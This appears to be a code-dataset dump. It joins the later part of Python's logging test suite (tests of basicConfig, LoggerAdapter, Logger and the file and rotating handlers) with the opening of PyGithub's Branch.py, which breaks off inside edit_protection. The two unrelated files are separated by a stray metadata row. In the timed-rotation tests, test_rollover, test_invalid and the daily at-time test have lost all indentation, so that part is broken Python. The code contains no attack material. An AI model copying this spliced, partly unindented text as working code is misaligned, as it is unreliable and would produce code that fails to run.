        self.assertIsNotNone(handlers[0].formatter)
        self.assertIsNotNone(handlers[1].formatter)
        self.assertIs(handlers[2].formatter, f)
        self.assertIs(handlers[0].formatter, handlers[1].formatter)

    def test_force(self):
        old_string_io = io.StringIO()
        new_string_io = io.StringIO()
        old_handlers = [logging.StreamHandler(old_string_io)]
        new_handlers = [logging.StreamHandler(new_string_io)]
        logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
        logging.warning('warn')
        logging.info('info')
        logging.debug('debug')
        self.assertEqual(len(logging.root.handlers), 1)
        # force=True replaces (and closes) the previous configuration.
        logging.basicConfig(level=logging.INFO, handlers=new_handlers,
                            force=True)
        logging.warning('warn')
        logging.info('info')
        logging.debug('debug')
        self.assertEqual(len(logging.root.handlers), 1)
        self.assertEqual(old_string_io.getvalue().strip(),
                         'WARNING:root:warn')
        self.assertEqual(new_string_io.getvalue().strip(),
                         'WARNING:root:warn\nINFO:root:info')

    def _test_log(self, method, level=None):
        """Verify the module-level shortcut calls basicConfig() (with no
        arguments) when the root logger has no handlers."""
        # logging.root has no handlers so basicConfig should be called
        called = []

        old_basic_config = logging.basicConfig
        def my_basic_config(*a, **kw):
            old_basic_config()
            old_level = logging.root.level
            logging.root.setLevel(100)  # avoid having messages in stderr
            self.addCleanup(logging.root.setLevel, old_level)
            called.append((a, kw))

        support.patch(self, logging, 'basicConfig', my_basic_config)

        log_method = getattr(logging, method)
        if level is not None:
            log_method(level, "test me")
        else:
            log_method("test me")

        # basicConfig was called with no arguments
        self.assertEqual(called, [((), {})])

    def test_log(self):
        self._test_log('log', logging.WARNING)

    def test_debug(self):
        self._test_log('debug')

    def test_info(self):
        self._test_log('info')

    def test_warning(self):
        self._test_log('warning')

    def test_error(self):
        self._test_log('error')

    def test_critical(self):
        self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
    """Test logging.LoggerAdapter delegation, including nested adapters."""

    def setUp(self):
        super(LoggerAdapterTest, self).setUp()
        old_handler_list = logging._handlerList[:]

        self.recording = RecordingHandler()
        self.logger = logging.root
        self.logger.addHandler(self.recording)
        self.addCleanup(self.logger.removeHandler, self.recording)
        self.addCleanup(self.recording.close)

        def cleanup():
            logging._handlerList[:] = old_handler_list

        self.addCleanup(cleanup)
        self.addCleanup(logging.shutdown)
        self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)

    def test_exception(self):
        msg = 'testing exception: %r'
        exc = None
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.adapter.exception(msg, self.recording)

        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        # exception() logs at ERROR with the active exception attached.
        self.assertEqual(record.levelno, logging.ERROR)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))

    def test_exception_excinfo(self):
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e

        # exc_info accepts an exception instance directly.
        self.adapter.exception('exc_info test', exc_info=exc)

        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))

    def test_critical(self):
        msg = 'critical test! %r'
        self.adapter.critical(msg, self.recording)

        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.CRITICAL)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))

    def test_is_enabled_for(self):
        old_disable = self.adapter.logger.manager.disable
        self.adapter.logger.manager.disable = 33
        self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
                        old_disable)
        self.assertFalse(self.adapter.isEnabledFor(32))

    def test_has_handlers(self):
        self.assertTrue(self.adapter.hasHandlers())

        for handler in self.logger.handlers:
            self.logger.removeHandler(handler)

        self.assertFalse(self.logger.hasHandlers())
        self.assertFalse(self.adapter.hasHandlers())

    def test_nested(self):
        class Adapter(logging.LoggerAdapter):
            prefix = 'Adapter'

            def process(self, msg, kwargs):
                return f"{self.prefix} {msg}", kwargs

        msg = 'Adapters can be nested, yo.'
        adapter = Adapter(logger=self.logger, extra=None)
        adapter_adapter = Adapter(logger=adapter, extra=None)
        adapter_adapter.prefix = 'AdapterAdapter'
        self.assertEqual(repr(adapter), repr(adapter_adapter))
        # Each adapter in the chain prefixes the message in turn.
        adapter_adapter.log(logging.CRITICAL, msg, self.recording)
        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        self.assertEqual(record.levelno, logging.CRITICAL)
        self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
        self.assertEqual(record.args, (self.recording,))
        # The manager property delegates through to the underlying logger,
        # and setting it propagates all the way down.
        orig_manager = adapter_adapter.manager
        self.assertIs(adapter.manager, orig_manager)
        self.assertIs(self.logger.manager, orig_manager)
        temp_manager = object()
        try:
            adapter_adapter.manager = temp_manager
            self.assertIs(adapter_adapter.manager, temp_manager)
            self.assertIs(adapter.manager, temp_manager)
            self.assertIs(self.logger.manager, temp_manager)
        finally:
            adapter_adapter.manager = orig_manager
        self.assertIs(adapter_adapter.manager, orig_manager)
        self.assertIs(adapter.manager, orig_manager)
        self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
    """Test the Logger class: levels, caller discovery, record creation,
    handler queries, pickling, and the isEnabledFor() cache."""

    def setUp(self):
        super(LoggerTest, self).setUp()
        self.recording = RecordingHandler()
        self.logger = logging.Logger(name='blah')
        self.logger.addHandler(self.recording)
        self.addCleanup(self.logger.removeHandler, self.recording)
        self.addCleanup(self.recording.close)
        self.addCleanup(logging.shutdown)

    def test_set_invalid_level(self):
        self.assertRaises(TypeError, self.logger.setLevel, object())

    def test_exception(self):
        msg = 'testing exception: %r'
        exc = None
        try:
            1 / 0
        except ZeroDivisionError as e:
            exc = e
            self.logger.exception(msg, self.recording)

        self.assertEqual(len(self.recording.records), 1)
        record = self.recording.records[0]
        # exception() logs at ERROR with exc_info from the active exception.
        self.assertEqual(record.levelno, logging.ERROR)
        self.assertEqual(record.msg, msg)
        self.assertEqual(record.args, (self.recording,))
        self.assertEqual(record.exc_info,
                         (exc.__class__, exc, exc.__traceback__))

    def test_log_invalid_level_with_raise(self):
        with support.swap_attr(logging, 'raiseExceptions', True):
            self.assertRaises(TypeError, self.logger.log, '10', 'test message')

    def test_log_invalid_level_no_raise(self):
        with support.swap_attr(logging, 'raiseExceptions', False):
            self.logger.log('10', 'test message')  # no exception happens

    def test_find_caller_with_stack_info(self):
        called = []
        support.patch(self, logging.traceback, 'print_stack',
                      lambda f, file: called.append(file.getvalue()))

        self.logger.findCaller(stack_info=True)

        self.assertEqual(len(called), 1)
        self.assertEqual('Stack (most recent call last):\n', called[0])

    def test_find_caller_with_stacklevel(self):
        # Each +1 on stacklevel should attribute the record to one frame
        # further up the call chain: innermost -> inner -> outer -> here.
        the_level = 1

        def innermost():
            self.logger.warning('test', stacklevel=the_level)

        def inner():
            innermost()

        def outer():
            inner()

        records = self.recording.records
        outer()
        self.assertEqual(records[-1].funcName, 'innermost')
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'inner')
        self.assertGreater(records[-1].lineno, lineno)
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'outer')
        self.assertGreater(records[-1].lineno, lineno)
        lineno = records[-1].lineno
        the_level += 1
        outer()
        self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
        self.assertGreater(records[-1].lineno, lineno)

    def test_make_record_with_extra_overwrite(self):
        name = 'my record'
        level = 13
        fn = lno = msg = args = exc_info = func = sinfo = None
        rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
                                       exc_info, func, sinfo)

        # 'extra' may not clobber existing record attributes.
        for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
            extra = {key: 'some value'}
            self.assertRaises(KeyError, self.logger.makeRecord, name, level,
                              fn, lno, msg, args, exc_info,
                              extra=extra, sinfo=sinfo)

    def test_make_record_with_extra_no_overwrite(self):
        name = 'my record'
        level = 13
        fn = lno = msg = args = exc_info = func = sinfo = None
        extra = {'valid_key': 'some value'}
        result = self.logger.makeRecord(name, level, fn, lno, msg, args,
                                        exc_info, extra=extra, sinfo=sinfo)
        self.assertIn('valid_key', result.__dict__)

    def test_has_handlers(self):
        self.assertTrue(self.logger.hasHandlers())

        for handler in self.logger.handlers:
            self.logger.removeHandler(handler)
        self.assertFalse(self.logger.hasHandlers())

    def test_has_handlers_no_propagate(self):
        child_logger = logging.getLogger('blah.child')
        child_logger.propagate = False
        self.assertFalse(child_logger.hasHandlers())

    def test_is_enabled_for(self):
        old_disable = self.logger.manager.disable
        self.logger.manager.disable = 23
        self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
        self.assertFalse(self.logger.isEnabledFor(22))

    def test_is_enabled_for_disabled_logger(self):
        old_disabled = self.logger.disabled
        old_disable = self.logger.manager.disable

        self.logger.disabled = True
        self.logger.manager.disable = 21

        self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
        self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)

        self.assertFalse(self.logger.isEnabledFor(22))

    def test_root_logger_aliases(self):
        root = logging.getLogger()
        self.assertIs(root, logging.root)
        self.assertIs(root, logging.getLogger(None))
        self.assertIs(root, logging.getLogger(''))
        self.assertIs(root, logging.getLogger('foo').root)
        self.assertIs(root, logging.getLogger('foo.bar').root)
        self.assertIs(root, logging.getLogger('foo').parent)

        self.assertIsNot(root, logging.getLogger('\0'))
        self.assertIsNot(root, logging.getLogger('foo.bar').parent)

    def test_invalid_names(self):
        self.assertRaises(TypeError, logging.getLogger, any)
        self.assertRaises(TypeError, logging.getLogger, b'foo')

    def test_pickling(self):
        # Pickling a logger round-trips to the same registry instance.
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
                logger = logging.getLogger(name)
                s = pickle.dumps(logger, proto)
                unpickled = pickle.loads(s)
                self.assertIs(unpickled, logger)

    def test_caching(self):
        root = self.root_logger
        logger1 = logging.getLogger("abc")
        logger2 = logging.getLogger("abc.def")

        # Set root logger level and ensure cache is empty
        root.setLevel(logging.ERROR)
        self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
        self.assertEqual(logger2._cache, {})

        # Ensure cache is populated and calls are consistent
        self.assertTrue(logger2.isEnabledFor(logging.ERROR))
        self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
        self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
        self.assertEqual(root._cache, {})
        self.assertTrue(logger2.isEnabledFor(logging.ERROR))

        # Ensure root cache gets populated
        self.assertEqual(root._cache, {})
        self.assertTrue(root.isEnabledFor(logging.ERROR))
        self.assertEqual(root._cache, {logging.ERROR: True})

        # Set parent logger level and ensure caches are emptied
        logger1.setLevel(logging.CRITICAL)
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})

        # Ensure logger2 uses parent logger's effective level
        self.assertFalse(logger2.isEnabledFor(logging.ERROR))

        # Set level to NOTSET and ensure caches are empty
        logger2.setLevel(logging.NOTSET)
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})
        self.assertEqual(logger1._cache, {})
        self.assertEqual(root._cache, {})

        # Verify logger2 follows parent and not root
        self.assertFalse(logger2.isEnabledFor(logging.ERROR))
        self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
        self.assertFalse(logger1.isEnabledFor(logging.ERROR))
        self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
        self.assertTrue(root.isEnabledFor(logging.ERROR))

        # Disable logging in manager and ensure caches are clear
        logging.disable()
        self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
        self.assertEqual(logger2._cache, {})
        self.assertEqual(logger1._cache, {})
        self.assertEqual(root._cache, {})

        # Ensure no loggers are enabled
        self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
        self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
        self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
    """Base class for handler tests that write to a temporary log file."""

    def setUp(self):
        BaseTest.setUp(self)
        # Create (and immediately close) a unique temp file for handlers.
        fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
        os.close(fd)
        # Extra files registered via assertLogFile(); removed in tearDown.
        self.rmfiles = []

    def tearDown(self):
        for fn in self.rmfiles:
            os.unlink(fn)
        if os.path.exists(self.fn):
            os.unlink(self.fn)
        BaseTest.tearDown(self)

    def assertLogFile(self, filename):
        """Assert that *filename* exists and schedule it for removal."""
        self.assertTrue(os.path.exists(filename),
                        msg="Log file %r does not exist" % filename)
        self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
    """Tests for logging.FileHandler."""

    def test_delay(self):
        """delay=True must defer opening the file until the first record."""
        os.unlink(self.fn)
        handler = logging.FileHandler(self.fn, delay=True)
        # Nothing has been logged yet: no open stream, no file on disk.
        self.assertFalse(os.path.exists(self.fn))
        self.assertIsNone(handler.stream)
        # Handling the first record forces the file open.
        handler.handle(logging.makeLogRecord({}))
        self.assertTrue(os.path.exists(self.fn))
        self.assertIsNotNone(handler.stream)
        handler.close()
class RotatingFileHandlerTest(BaseFileTest):
    """Test RotatingFileHandler rollover, custom namer and rotator."""

    def next_rec(self):
        """Return a fresh DEBUG LogRecord with a unique message."""
        return logging.LogRecord('n', logging.DEBUG, 'p', 1,
                                 self.next_message(), None, None, None)

    def test_should_not_rollover(self):
        # maxBytes=0 means "never roll over".
        rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
        self.assertFalse(rh.shouldRollover(None))
        rh.close()

    def test_should_rollover(self):
        rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
        self.assertTrue(rh.shouldRollover(self.next_rec()))
        rh.close()

    def test_file_created(self):
        # checks that the file is created and assumes it was created
        rh = logging.handlers.RotatingFileHandler(self.fn)
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        rh.close()

    def test_rollover_filenames(self):
        def namer(name):
            return name + ".test"
        rh = logging.handlers.RotatingFileHandler(
            self.fn, backupCount=2, maxBytes=1)
        rh.namer = namer
        rh.emit(self.next_rec())
        self.assertLogFile(self.fn)
        # Each further emit rotates, producing namer-renamed backups.
        rh.emit(self.next_rec())
        self.assertLogFile(namer(self.fn + ".1"))
        rh.emit(self.next_rec())
        self.assertLogFile(namer(self.fn + ".2"))
        # backupCount=2 caps the number of kept backups.
        self.assertFalse(os.path.exists(namer(self.fn + ".3")))
        rh.close()

    @support.requires_zlib
    def test_rotator(self):
        def namer(name):
            return name + ".gz"

        def rotator(source, dest):
            # Compress the rolled-over file instead of a plain rename.
            with open(source, "rb") as sf:
                data = sf.read()
                compressed = zlib.compress(data, 9)
                with open(dest, "wb") as df:
                    df.write(compressed)
            os.remove(source)

        rh = logging.handlers.RotatingFileHandler(
            self.fn, backupCount=2, maxBytes=1)
        rh.rotator = rotator
        rh.namer = namer
        m1 = self.next_rec()
        rh.emit(m1)
        self.assertLogFile(self.fn)
        m2 = self.next_rec()
        rh.emit(m2)
        # First backup holds m1's message, compressed.
        fn = namer(self.fn + ".1")
        self.assertLogFile(fn)
        newline = os.linesep
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m1.msg + newline)
        rh.emit(self.next_rec())
        fn = namer(self.fn + ".2")
        self.assertLogFile(fn)
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m1.msg + newline)
        rh.emit(self.next_rec())
        # After another rollover, .2 now holds m2's message.
        fn = namer(self.fn + ".2")
        with open(fn, "rb") as f:
            compressed = f.read()
            data = zlib.decompress(compressed)
            self.assertEqual(data.decode("ascii"), m2.msg + newline)
        self.assertFalse(os.path.exists(namer(self.fn + ".3")))
        rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1)
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
    #@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
    def test_compute_rollover_weekly_attime(self):
        """For each weekday W0..W6, a weekly handler with atTime=12:00 must
        roll over at noon (UTC) on the next occurrence of that weekday."""
        currentTime = int(time.time())
        today = currentTime - currentTime % 86400
        atTime = datetime.time(12, 0, 0)
        wday = time.gmtime(today).tm_wday
        for day in range(7):
            rh = logging.handlers.TimedRotatingFileHandler(
                self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
                atTime=atTime)
            try:
                if wday > day:
                    # The rollover day has already passed this week, so we
                    # go over into next week
                    expected = (7 - wday + day)
                else:
                    expected = (day - wday)
                # At this point expected is in days from now, convert to seconds
                expected *= 24 * 60 * 60
                # Add in the rollover time
                expected += 12 * 60 * 60
                # Add in adjustment for today
                expected += today
                actual = rh.computeRollover(today)
                if actual != expected:
                    # Extra diagnostics before failing: the computation is
                    # timezone sensitive, so record the local context.
                    print('failed in timezone: %d' % time.timezone)
                    print('local vars: %s' % locals())
                self.assertEqual(actual, expected)
                if day == wday:
                    # goes into following week
                    expected += 7 * 24 * 60 * 60
                    actual = rh.computeRollover(today + 13 * 60 * 60)
                    if actual != expected:
                        print('failed in timezone: %d' % time.timezone)
                        print('local vars: %s' % locals())
                    self.assertEqual(actual, expected)
            finally:
                rh.close()
# Dynamically attach one test_compute_rollover_<WHEN> method to
# TimedRotatingFileHandlerTest for each supported rollover specifier.
def secs(**kw):
    """Return the timedelta described by ``kw`` as a whole number of seconds."""
    return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
                  ('M', 60),
                  ('H', 60 * 60),
                  ('D', 60 * 60 * 24),
                  ('MIDNIGHT', 60 * 60 * 24),
                  # current time (epoch start) is a Thursday, W0 means Monday
                  ('W0', secs(days=4, hours=24)),
                  ):
    def test_compute_rollover(self, when=when, exp=exp):
        # ``when`` and ``exp`` are bound as parameter defaults so each
        # generated test keeps its own values from the loop iteration.
        rh = logging.handlers.TimedRotatingFileHandler(
            self.fn, when=when, interval=1, backupCount=0, utc=True)
        currentTime = 0.0
        actual = rh.computeRollover(currentTime)
        if exp != actual:
            # Failures occur on some systems for MIDNIGHT and W0.
            # Print detailed calculation for MIDNIGHT so we can try to see
            # what's going on
            if when == 'MIDNIGHT':
                try:
                    if rh.utc:
                        t = time.gmtime(currentTime)
                    else:
                        t = time.localtime(currentTime)
                    currentHour = t[3]
                    currentMinute = t[4]
                    currentSecond = t[5]
                    # r is the number of seconds left between now and midnight
                    r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
                                                       currentMinute) * 60 +
                                                      currentSecond)
                    result = currentTime + r
                    print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
                    print('currentHour: %s' % currentHour, file=sys.stderr)
                    print('currentMinute: %s' % currentMinute, file=sys.stderr)
                    print('currentSecond: %s' % currentSecond, file=sys.stderr)
                    print('r: %s' % r, file=sys.stderr)
                    print('result: %s' % result, file=sys.stderr)
                except Exception:
                    print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
        self.assertEqual(exp, actual)
        rh.close()
    setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
    def test_basic(self):
        """Emit a record through NTEventLogHandler and read it back from the
        Windows 'Application' event log."""
        logtype = 'Application'
        elh = win32evtlog.OpenEventLog(None, logtype)
        num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
        try:
            h = logging.handlers.NTEventLogHandler('test_logging')
        except pywintypes.error as e:
            if e.winerror == 5:  # access denied — registering a source needs admin rights
                raise unittest.SkipTest('Insufficient privileges to run test')
            raise
        r = logging.makeLogRecord({'msg': 'Test Log Message'})
        h.handle(r)
        h.close()
        # The record count must have grown by at least one.
        self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
        flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
                win32evtlog.EVENTLOG_SEQUENTIAL_READ
        found = False
        GO_BACK = 100
        # Scan the most recent GO_BACK records for our message.
        events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
        for e in events:
            if e.SourceName != 'test_logging':
                continue
            msg = win32evtlogutil.SafeFormatMessage(e, logtype)
            if msg != 'Test Log Message\r\n':
                continue
            found = True
            break
        msg = 'Record not found in event log, went back %d records' % GO_BACK
        self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
    def test__all__(self):
        """logging.__all__ must cover every public name except these internals."""
        not_exported = {
            'logThreads', 'logMultiprocessing', 'logProcesses',
            'currentframe', 'PercentStyle', 'StrFormatStyle',
            'StringTemplateStyle', 'Filterer', 'PlaceHolder',
            'Manager', 'RootLogger', 'root', 'threading',
        }
        support.check__all__(self, logging, blacklist=not_exported)
@support.run_with_locale('LC_ALL', '')
def test_main():
    """Run the whole logging test suite under the user's default locale."""
    tests = [
        BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
        HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
        DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
        ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
        StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
        QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
        LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
        RotatingFileHandlerTest, LastResortTest, LogRecordTest,
        ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
        NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
        UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
        MiscTestCase
    ]
    # QueueListener only exists when the threading module is available.
    if hasattr(logging.handlers, 'QueueListener'):
        tests.append(QueueListenerTest)
    support.run_unittest(*tests)
if __name__ == "__main__":
    test_main()
| true | true |
f723301c992529f6902bb52d24c8d1d5b8a2c80b | 23,884 | py | Python | github/Branch.py | aantr/WindowsHostManager | 75d248fc8991d471c6802fa79e7dee44a5708c65 | [
"CNRI-Python-GPL-Compatible"
] | 1 | 2021-06-25T09:13:12.000Z | 2021-06-25T09:13:12.000Z | venv/lib/python3.6/site-packages/github/Branch.py | rongshaoshuai/blogs | dafeb789428436c1ec8069e605400612b776b8f2 | [
"MIT"
] | 3 | 2021-03-30T23:03:03.000Z | 2021-03-30T23:06:57.000Z | lib/github/Branch.py | Corionis/Knobs-And-Scripts | 81a954fd0ed697e5759359ec0383a3f16a841143 | [
"MIT"
] | null | null | null | ############################ Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 AKFish <akfish@gmail.com> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2013 martinqt <m.ki2@laposte.net> #
# Copyright 2014 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2015 Kyle Hornberg <khornberg@users.noreply.github.com> #
# Copyright 2016 Jannis Gebauer <ja.geb@me.com> #
# Copyright 2016 Peter Buckley <dx-pbuckley@users.noreply.github.com> #
# Copyright 2018 Steve Kowalik <steven@wedontsleep.org> #
# Copyright 2018 Wan Liuyang <tsfdye@gmail.com> #
# Copyright 2018 sfdye <tsfdye@gmail.com> #
# #
# This file is part of PyGithub. #
# http://pygithub.readthedocs.io/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
################################################################################
import github.BranchProtection
import github.Commit
import github.GithubObject
import github.RequiredPullRequestReviews
import github.RequiredStatusChecks
from . import Consts
class Branch(github.GithubObject.NonCompletableGithubObject):
    """
    This class represents Branches. The reference can be found here https://developer.github.com/v3/repos/branches
    """
    def __repr__(self):
        return self.get__repr__({"name": self._name.value})
    @property
    def commit(self):
        """
        :type: :class:`github.Commit.Commit`
        """
        return self._commit.value
    @property
    def name(self):
        """
        :type: string
        """
        return self._name.value
    @property
    def protected(self):
        """
        :type: bool
        """
        return self._protected.value
    @property
    def protection_url(self):
        """
        :type: string
        """
        return self._protection_url.value
    def _initAttributes(self):
        # All attributes start as NotSet; _useAttributes fills in whatever
        # keys the API response actually contained.
        self._commit = github.GithubObject.NotSet
        self._name = github.GithubObject.NotSet
        self._protection_url = github.GithubObject.NotSet
        self._protected = github.GithubObject.NotSet
    def _useAttributes(self, attributes):
        # Copy recognized keys from the raw API payload into typed attributes.
        if "commit" in attributes: # pragma no branch
            self._commit = self._makeClassAttribute(
                github.Commit.Commit, attributes["commit"]
            )
        if "name" in attributes: # pragma no branch
            self._name = self._makeStringAttribute(attributes["name"])
        if "protection_url" in attributes: # pragma no branch
            self._protection_url = self._makeStringAttribute(
                attributes["protection_url"]
            )
        if "protected" in attributes: # pragma no branch
            self._protected = self._makeBoolAttribute(attributes["protected"])
    def get_protection(self):
        """
        :calls: `GET /repos/:owner/:repo/branches/:branch/protection <https://developer.github.com/v3/repos/branches>`_
        :rtype: :class:`github.BranchProtection.BranchProtection`
        """
        headers, data = self._requester.requestJsonAndCheck(
            "GET",
            self.protection_url,
            headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
        )
        return github.BranchProtection.BranchProtection(
            self._requester, headers, data, completed=True
        )
    def edit_protection(
        self,
        strict=github.GithubObject.NotSet,
        contexts=github.GithubObject.NotSet,
        enforce_admins=github.GithubObject.NotSet,
        dismissal_users=github.GithubObject.NotSet,
        dismissal_teams=github.GithubObject.NotSet,
        dismiss_stale_reviews=github.GithubObject.NotSet,
        require_code_owner_reviews=github.GithubObject.NotSet,
        required_approving_review_count=github.GithubObject.NotSet,
        user_push_restrictions=github.GithubObject.NotSet,
        team_push_restrictions=github.GithubObject.NotSet,
    ):
        """
        :calls: `PUT /repos/:owner/:repo/branches/:branch/protection <https://developer.github.com/v3/repos/branches>`_
        :strict: bool
        :contexts: list of strings
        :enforce_admins: bool
        :dismissal_users: list of strings
        :dismissal_teams: list of strings
        :dismiss_stale_reviews: bool
        :require_code_owner_reviews: bool
        :required_approving_review_count: int
        :user_push_restrictions: list of strings
        :team_push_restrictions: list of strings
        NOTE: The GitHub API groups strict and contexts together, both must
        be submitted. Take care to pass both as arguments even if only one is
        changing. Use edit_required_status_checks() to avoid this.
        """
        assert strict is github.GithubObject.NotSet or isinstance(strict, bool), strict
        assert contexts is github.GithubObject.NotSet or all(
            isinstance(element, str) for element in contexts
        ), contexts
        assert enforce_admins is github.GithubObject.NotSet or isinstance(
            enforce_admins, bool
        ), enforce_admins
        assert dismissal_users is github.GithubObject.NotSet or all(
            isinstance(element, str) for element in dismissal_users
        ), dismissal_users
        assert dismissal_teams is github.GithubObject.NotSet or all(
            isinstance(element, str) for element in dismissal_teams
        ), dismissal_teams
        assert dismiss_stale_reviews is github.GithubObject.NotSet or isinstance(
            dismiss_stale_reviews, bool
        ), dismiss_stale_reviews
        assert require_code_owner_reviews is github.GithubObject.NotSet or isinstance(
            require_code_owner_reviews, bool
